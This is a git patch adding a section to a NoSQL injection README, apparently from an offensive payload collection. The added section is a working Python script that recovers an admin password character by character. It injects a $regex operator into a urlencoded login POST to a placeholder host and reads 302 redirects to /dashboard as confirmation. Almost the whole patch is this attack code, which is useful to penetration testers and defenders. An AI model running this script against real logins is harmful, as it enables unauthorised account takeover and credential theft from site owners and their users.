From e0f851e6e9e561b8ce71cab67f726da1ca461ae1 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Sun, 7 Nov 2021 17:49:50 +0100
Subject: [PATCH] NoSQLi: add POST with urlencoded body

---
 NoSQL Injection/README.md | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)

diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md
index cebfe1b..a37eb71 100644
--- a/NoSQL Injection/README.md	
+++ b/NoSQL Injection/README.md	
@@ -98,6 +98,30 @@ while True:
                 password += c
 ```
 
+### POST with urlencoded body
+
+```python
+import requests
+import urllib3
+import string
+import urllib
+urllib3.disable_warnings()
+
+username="admin"
+password=""
+u="http://example.org/login"
+headers={'content-type': 'application/x-www-form-urlencoded'}
+
+while True:
+    for c in string.printable:
+        if c not in ['*','+','.','?','|','&','$']:
+            payload='user=%s&pass[$regex]=^%s&remember=on' % (username, password + c)
+            r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
+            if r.status_code == 302 and r.headers['Location'] == '/dashboard':
+                print("Found one more char : %s" % (password+c))
+                password += c
+```
+
 ### GET
 
 ```python